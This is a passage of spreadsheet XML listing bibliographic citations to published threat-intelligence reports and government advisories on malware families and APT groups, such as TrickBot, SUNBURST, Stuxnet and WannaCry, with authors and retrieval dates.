    <t>Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020.</t>
  </si>
  <si>
    <t>Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>CTU. (2018, September 27). Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.</t>
  </si>
  <si>
    <t>Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. Retrieved January 26, 2017.</t>
  </si>
  <si>
    <t>Damele, B., Stampar, M. (n.d.). sqlmap. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Platt, J. and Reeves, J.. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.</t>
  </si>
  <si>
    <t>Lookout. (n.d.). Stealth Mango &amp; Tangelo. Retrieved September 27, 2018.</t>
  </si>
  <si>
    <t>Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.</t>
  </si>
  <si>
    <t>Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017.</t>
  </si>
  <si>
    <t>Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.</t>
  </si>
  <si>
    <t>Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020.</t>
  </si>
  <si>
    <t>Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.</t>
  </si>
  <si>
    <t>CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.</t>
  </si>
  <si>
    <t>Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.</t>
  </si>
  <si>
    <t>Ralph Langner. (2013, November). Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.</t>
  </si>
  <si>
    <t>Sudhakar Ramakrishna . (2021, January 11). New Findings From Our Investigation of SUNBURST. Retrieved January 13, 2021.</t>
  </si>
  <si>
    <t>FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.</t>
  </si>
  <si>
    <t>Stephen Eckels, Jay Smith, William Ballenthin. (2020, December 24). SUNBURST Additional Technical Details. Retrieved January 6, 2021.</t>
  </si>
  <si>
    <t>Symantec Threat Hunter Team. (2021, January 22). SolarWinds: How Sunburst Sends Data Back to the Attackers. Retrieved January 22, 2021.</t>
  </si>
  <si>
    <t>CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.</t>
  </si>
  <si>
    <t>Riley, W. (2020, December 1). SUPERNOVA SolarWinds .NET Webshell Analysis. Retrieved February 18, 2021.</t>
  </si>
  <si>
    <t>Tennis, M. (2020, December 17). SUPERNOVA: A Novel .NET Webshell. Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>SolarWinds. (2020, December 24). SolarWinds Security Advisory. Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>CISA. (2021, January 27). Malware Analysis Report (AR21-027A). Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>Carnegie Mellon University. (2020, December 26). SolarWinds Orion API authentication bypass allows remote command execution. Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>Stoner, J. (2021, January 21). Detecting Supernova Malware: SolarWinds Continued. Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>Blasco, J. (2012, January 12). Sykipot variant hijacks DOD and Windows smart cards. Retrieved January 10, 2016.</t>
  </si>
  <si>
    <t>Blasco, J. (2013, March 21). New Sykipot developments [Blog]. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Blasco, J. (2011, December 12). Another Sykipot sample likely targeting US federal agencies. Retrieved March 28, 2016.</t>
  </si>
  <si>
    <t>Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelgänging technique. Retrieved May 22, 2018.</t>
  </si>
  <si>
    <t>Bettencourt, J. (2018, May 7). Kaspersky Lab finds new variant of SynAck ransomware using sophisticated Doppelgänging technique. Retrieved May 24, 2018.</t>
  </si>
  <si>
    <t>Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Systeminfo. Retrieved April 8, 2016.</t>
  </si>
  <si>
    <t>Moran, N. and Lanstein, A.. (2014, March 25). Spear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370. Retrieved April 15, 2016.</t>
  </si>
  <si>
    <t>Grunzweig, J. and Miller-Osborn, J.. (2016, February 4). T9000: Advanced Modular Backdoor Uses Complex Anti-Analysis Techniques. Retrieved April 15, 2016.</t>
  </si>
  <si>
    <t>CISA, FBI, DOD. (2021, August). MAR-10292089-1.v2 – Chinese Remote Access Trojan: TAIDOOR. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>Trend Micro. (2012). The Taidoor Campaign. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>USG. (2020, May 12). MAR-10288834-2.v1 – North Korean Trojan: TAINTEDSCRIBE. Retrieved March 5, 2021.</t>
  </si>
  <si>
    <t>GReAT. (2019, April 10). Project TajMahal – a sophisticated new APT framework. Retrieved October 14, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Tasklist. Retrieved December 23, 2015.</t>
  </si>
  <si>
    <t>Check Point Research. (2020, December 22). SUNBURST, TEARDROP and the NetSec New Normal. Retrieved January 6, 2021.</t>
  </si>
  <si>
    <t>Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020.</t>
  </si>
  <si>
    <t>Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 18, 2021.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021.</t>
  </si>
  <si>
    <t>Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021.</t>
  </si>
  <si>
    <t>Phil Stokes. (2020, July 8). “EvilQuest” Rolls Ransomware, Spyware &amp; Data Theft Into One. Retrieved April 1, 2021.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2020, June 29). OSX.EvilQuest Uncovered part i: infection, persistence, and more!. Retrieved March 18, 2021.</t>
  </si>
  <si>
    <t>Gabrielle Joyce Mabutas, Luis Magisa, Steven Du. (2020, July 17). Updates on Quickly-Evolving ThiefQuest macOS Malware. Retrieved April 26, 2021.</t>
  </si>
  <si>
    <t>S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021.</t>
  </si>
  <si>
    <t>Roger Dingledine, Nick Mathewson and Paul Syverson. (2004). Tor: The Second-Generation Onion Router. Retrieved December 21, 2017.</t>
  </si>
  <si>
    <t>Snow, J. (2016, March 3). Triada: organized crime on Android. Retrieved July 16, 2019.</t>
  </si>
  <si>
    <t>Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019.</t>
  </si>
  <si>
    <t>Kivva, A. (2016, June 6). Everyone sees not what they want to see. Retrieved July 16, 2019.</t>
  </si>
  <si>
    <t>Krebs, B. (2019, June 25). Tracing the Supply Chain Attack on Android. Retrieved July 16, 2019.</t>
  </si>
  <si>
    <t>Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018.</t>
  </si>
  <si>
    <t>Reaves, J. (2016, October 15). TrickBot: We Missed you, Dyre. Retrieved August 2, 2018.</t>
  </si>
  <si>
    <t>Keshet, L. (2016, November 09). Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations. Retrieved August 2, 2018.</t>
  </si>
  <si>
    <t>Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018.</t>
  </si>
  <si>
    <t>Pornasdoro, A. (2017, October 12). Trojan:Win32/Totbrick. Retrieved September 14, 2018.</t>
  </si>
  <si>
    <t>Anthony, N., Pascual, C.. (2018, November 1). Trickbot Shows Off New Trick: Password Grabber Module. Retrieved November 16, 2018.</t>
  </si>
  <si>
    <t>Boutin, J. (2020, October 12). ESET takes part in global operation to disrupt Trickbot. Retrieved March 15, 2021.</t>
  </si>
  <si>
    <t>Tudorica, R., Maximciuc, A., Vatamanu, C. (2020, March 18). New TrickBot Module Bruteforces RDP Connections, Targets Select Telecommunication Services in US and Hong Kong. Retrieved March 15, 2021.</t>
  </si>
  <si>
    <t>Radu Tudorica. (2021, July 12). A Fresh Look at Trickbot’s Ever-Improving VNC Module. Retrieved September 28, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Llimos, N., Pascual, C.. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Joe Security. (2020, July 13). TrickBot's new API-Hammering explained. Retrieved September 30, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Bacurio Jr., F. and Salvio, J. (2018, April 9). Trickbot’s New Reconnaissance Plugin. Retrieved February 14, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Liviu Arsene, Radu Tudorica. (2020, November 23). TrickBot is Dead. Long Live TrickBot!. Retrieved September 28, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Eclypsium, Advanced Intelligence. (2020, December 1). TRICKBOT NOW OFFERS ‘TRICKBOOT’: PERSIST, BRICK, PROFIT. Retrieved March 15, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ionut Illascu. (2021, July 14). Trickbot updates its VNC module for high-value targets. Retrieved September 10, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020.</t>
  </si>
  <si>
    <t>Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 201Retrieved December 22, 2016.</t>
  </si>
  <si>
    <t>Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.</t>
  </si>
  <si>
    <t>Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.</t>
  </si>
  <si>
    <t>Ge, L. (2011, September 9). BIOS Threat is Showing up Again!. Retrieved November 14, 2014.</t>
  </si>
  <si>
    <t>Microsoft. (2017, September 15). Backdoor:Win32/Truvasys.A!dha. Retrieved November 30, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved November 27, 2017.</t>
  </si>
  <si>
    <t>Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020.</t>
  </si>
  <si>
    <t>Gavriel, H. &amp; Erbesfeld, B. (2018, April 11). New ‘Early Bird’ Code Injection Technique Discovered. Retrieved May 24, 2018.</t>
  </si>
  <si>
    <t>ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016.</t>
  </si>
  <si>
    <t>US-CERT. (2018, June 14). MAR-10135536-12 – North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.</t>
  </si>
  <si>
    <t>UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.</t>
  </si>
  <si>
    <t>Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.</t>
  </si>
  <si>
    <t>Fernando Mercês. (2016, September 5). Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems. Retrieved March 5, 2018.</t>
  </si>
  <si>
    <t>Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.</t>
  </si>
  <si>
    <t>NJCCIC. (2016, September 27). Ursnif. Retrieved June 4, 2019.</t>
  </si>
  <si>
    <t>Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.</t>
  </si>
  <si>
    <t>Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019.</t>
  </si>
  <si>
    <t>Vaish, A. &amp; Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved June 5, 2019.</t>
  </si>
  <si>
    <t>Trend Micro. (2014, December 11). PE_URSNIF.ARetrieved June 5, 2019.</t>
  </si>
  <si>
    <t>Sioting, S. (2013, June 15). BKDR_URSNIF.SM. Retrieved June 5, 2019.</t>
  </si>
  <si>
    <t>Holland, A. (2019, March 7). Tricks and COMfoolery: How Ursnif Evades Detection. Retrieved June 10, 2019.</t>
  </si>
  <si>
    <t>Caragay, R. (2014, December 11). Info-Stealing File Infector Hits US, UK. Retrieved June 5, 2019.</t>
  </si>
  <si>
    <t>Duncan, B. (2021, January 7). TA551: Email Attack Campaign Switches from Valak to IcedID. Retrieved March 17, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Secureworks. (n.d.). GOLD CABIN Threat Profile. Retrieved March 17, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Chen, J.. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.</t>
  </si>
  <si>
    <t>Calvet, J. (2014, November 11). Sednit Espionage Group Attacking Air-Gapped Networks. Retrieved January 4, 2017.</t>
  </si>
  <si>
    <t>Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020.</t>
  </si>
  <si>
    <t>Zhou, R. (2012, May 15). Backdoor.Vasport. Retrieved February 22, 2018.</t>
  </si>
  <si>
    <t>Lancaster, T., Cortes, J. (2018, January 29). VERMIN: Quasar RAT and Custom Malware Used In Ukraine. Retrieved July 5, 2018.</t>
  </si>
  <si>
    <t>GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.</t>
  </si>
  <si>
    <t>L. Arsene, C. Ochinca. (2018, August 20). Triout – Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020.</t>
  </si>
  <si>
    <t>M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020.</t>
  </si>
  <si>
    <t>US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.</t>
  </si>
  <si>
    <t>US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018.</t>
  </si>
  <si>
    <t>Yagi, J. (2014, August 24). Trojan.Volgmer. Retrieved July 16, 2018.</t>
  </si>
  <si>
    <t>Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>Dwoskin, E. and Adam, K. (2017, May 14). More than 150 countries affected by massive cyberattack, Europol says. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.</t>
  </si>
  <si>
    <t>FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.</t>
  </si>
  <si>
    <t>Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021.</t>
  </si>
  <si>
    <t>Antenucci, S., Pantazopoulos, N., Sandee, M. (2020, June 23). WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group. Retrieved September 14, 2021.</t>
  </si>
  <si>
    <t>Walter, J.. (2020, July 23). WastedLocker Ransomware: Abusing ADS and NTFS File Attributes. Retrieved September 14, 2021.</t>
  </si>
  <si>
    <t>CISA. (2020, July 16). MAR-10296782-3.v1 – WELLMAIL. Retrieved September 29, 2020.</t>
  </si>
  <si>
    <t>CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020.</t>
  </si>
  <si>
    <t>PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.</t>
  </si>
  <si>
    <t>PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). wevtutil. Retrieved September 14, 2021.</t>
  </si>
  <si>
    <t>F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020.</t>
  </si>
  <si>
    <t>Zhou, R. (2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.</t>
  </si>
  <si>
    <t>Amplia Security. (n.d.). Windows Credentials Editor (WCE) F.A.Q.. Retrieved December 17, 2015.</t>
  </si>
  <si>
    <t>Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020.</t>
  </si>
  <si>
    <t>Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020.</t>
  </si>
  <si>
    <t>Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019.</t>
  </si>
  <si>
    <t>Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019.</t>
  </si>
  <si>
    <t>Skalkotos, N. (2013, September 20). WinExe. Retrieved January 22, 2018.</t>
  </si>
  <si>
    <t>Guarnieri, C. (2015, June 19). Digital Attack on German Parliament: Investigative Report on the Hack of the Left Party Infrastructure in Bundestag. Retrieved January 22, 2018.</t>
  </si>
  <si>
    <t>Prakash, T. (2017, June 21). Run commands on Windows system remotely using Winexe. Retrieved January 22, 2018.</t>
  </si>
  <si>
    <t>GReAT. (2017, November 1). Silence – a new Trojan attacking financial organizations. Retrieved May 24, 2019.</t>
  </si>
  <si>
    <t>Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2017, November 9). Backdoor:Win32/Wingbird.A!dha. Retrieved November 27, 2017.</t>
  </si>
  <si>
    <t>Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017.</t>
  </si>
  <si>
    <t>Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017.</t>
  </si>
  <si>
    <t>Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.</t>
  </si>
  <si>
    <t>Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Dell SecureWorks. (2013, March 21). Wiper Malware Analysis Attacking Korean Financial Sector. Retrieved May 13, 2015.</t>
  </si>
  <si>
    <t>Claud Xiao. (2014, November 5). WireLurker: A New Era in OS X and iOS Malware. Retrieved January 24, 2017.</t>
  </si>
  <si>
    <t>W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020.</t>
  </si>
  <si>
    <t>CrowdStrike Global Intelligence Team. (2016). Use of Fancy Bear Android Malware in Tracking of Ukrainian FIeld Artillery Units. Retrieved February 6, 2017.</t>
  </si>
  <si>
    <t>Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.</t>
  </si>
  <si>
    <t>Trend Micro. (2018, September 19). New Multi-Platform Xbash Packs Obfuscation, Ransomware, Coinminer, Worm and Botnet. Retrieved June 4, 2019.</t>
  </si>
  <si>
    <t>Cong Zheng, Claud Xiao and Zhi Xu. (2016, February 18). New Android Trojan “Xbot” Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom. Retrieved December 21, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2017, August 8). APT Trends report Q2 201Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>Rayaprolu, A.. (2011, April 12). xCmd an Alternative to PsExec. Retrieved August 10, 2016.</t>
  </si>
  <si>
    <t>Claud Xiao. (2015, September 17). Novel Malware XcodeGhost Modifies Xcode, Infects Apple iOS Apps and Hits App Store. Retrieved December 21, 2016.</t>
  </si>
  <si>
    <t>Claud Xiao. (2015, September 18). Update: XcodeGhost Attacker Can Phish Passwords and Open URLs through Infected Apps. Retrieved December 21, 2016.</t>
  </si>
  <si>
    <t>Mac Threat Response, Mobile Research Team. (2020, August 13). The XCSSET Malware: Inserts Malicious Code Into Xcode Projects, Performs UXSS Backdoor Planting in Safari, and Leverages Two Zero-day Exploits. Retrieved October 5, 2021.</t>
  </si>
  <si>
    <t>Thomas Reed. (2020, April 21). OSX.DubRobber. Retrieved October 5, 2021.</t>
  </si>
  <si>
    <t>Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020.</t>
  </si>
  <si>
    <t>Lorin Wu. (2018, April 19). XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing. Retrieved July 6, 2018.</t>
  </si>
  <si>
    <t>Belcher, P.. (2016, July 28). Tunnel of Gov: DNC Hack and the Russian XTunnel. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.</t>
  </si>
  <si>
    <t>Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved January 20, 2017.</t>
  </si>
  <si>
    <t>Schwarz, D., Sopko J. (2018, March 08). Donot Team Leverages New Modular Malware Framework in South Asia. Retrieved June 11, 2018.</t>
  </si>
  <si>
    <t>CISA. (2020, October 29). Malware Analysis Report (AR20-303B). Retrieved December 9, 2020.</t>
  </si>
  <si>
    <t>Shoorbajee, Z. (2018, November 29). Accenture: Russian hackers using Brexit talks to disguise phishing lures. Retrieved July 16, 2019.</t>
  </si>
  <si>
    <t>Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.</t>
  </si>
  <si>
    <t>ESET. (2018, November 20). Sednit: What’s going on with Zebrocy?. Retrieved February 12, 2019.</t>
  </si>
  <si>
    <t>ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.</t>
  </si>
  <si>
    <t>Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020.</t>
  </si>
  <si>
    <t>Claud Xiao. (2016, February 21). Pirated iOS App Store’s Client Successfully Evaded Apple iOS Code Review. Retrieved December 12, 2016.</t>
  </si>
  <si>
    <t>Wyke, J. (2012, April). ZeroAccess. Retrieved July 18, 2016.</t>
  </si>
  <si>
    <t>Ciubotariu, M. (2014, January 23). Trojan.Zeroaccess.C Hidden in NTFS EA. Retrieved December 2, 2014.</t>
  </si>
  <si>
    <t>Brumaghin, E., et al. (2017, November 02). Poisoning the Well: Banking Trojan Targets Google Search Results. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Ebach, L. (2017, June 22). Analysis Results of Zeus.Variant.Panda. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.</t>
  </si>
  <si>
    <t>White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.</t>
  </si>
  <si>
    <t>UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.</t>
  </si>
  <si>
    <t>Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.</t>
  </si>
  <si>
    <t>UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.</t>
  </si>
  <si>
    <t>NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.</t>
  </si>
  <si>
    <t>UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.</t>
  </si>
  <si>
    <t>CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dunwoody, M. and Carr, N.. (2016, September 27). No Easy Breach DerbyCon 201Retrieved October 4, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 30, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC245Retrieved March 12, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MSTIC, CDOC, 365 Defender Research Team. (2021, January 20). Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop . Retrieved January 22, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec Security Response. (2015, July 13). “Forkmeiamfamous”: Seaduke, latest weapon in the Duke armory. Retrieved July 22, 2015.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MSRC Team. (2021, February 18). Microsoft Internal Solorigate Investigation – Final Update. Retrieved May 14, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec Threat Hunter Team. (2021, January 18). Raindrop: New Malware Discovered in SolarWinds Investigation. Retrieved January 19, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dunwoody, M. (2017, March 27). APT29 Domain Fronting With TOR. Retrieved March 27, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
